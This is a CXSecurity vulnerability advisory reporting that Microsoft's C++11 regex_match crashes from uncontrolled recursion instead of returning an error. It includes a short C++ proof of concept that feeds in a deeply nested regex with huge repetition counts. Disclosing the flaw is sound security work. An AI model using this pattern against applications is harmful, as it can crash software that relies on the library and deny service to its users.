Microsoft C++11 'regex_match' function stack exhaustion

Published
Credit
Risk
2015.11.14
CXSECURITY
Low
CWE
CVE
Local
Remote
N/A
N/A
Yes
No

Microsoft C++11 <regex> 'regex_match' function Stack Overflow
Auhor: Maksymilian Arciemowicz
Tested on: Windows 10 and Visual Studio 2013
CWE: https://cwe.mitre.org/data/definitions/674.html

The Microsoft C++11 <regex> does not properly control the amount of recursion that takes place, which consumes excessive resources of stack.

Expected 'error_type':
error_stack there was not enough memory to perform a match

Retured:
Crash due stack exhaustion

PoC:
-------------------
#include "stdafx.h"
#include <regex>
#include <iostream>

using namespace std;

int _tmain(int argc, _TCHAR* argv[])
{

const char *first = "abc abc abc abc abc abc abc abc abc";
const char *last = first + strlen(first);
cmatch narrowMatch;

regex rx("((((((((.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*)");
bool found = regex_match(first, last, narrowMatch, rx);

return 0;

}
-------------------

References:

https://cwe.mitre.org/data/definitions/674.html


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com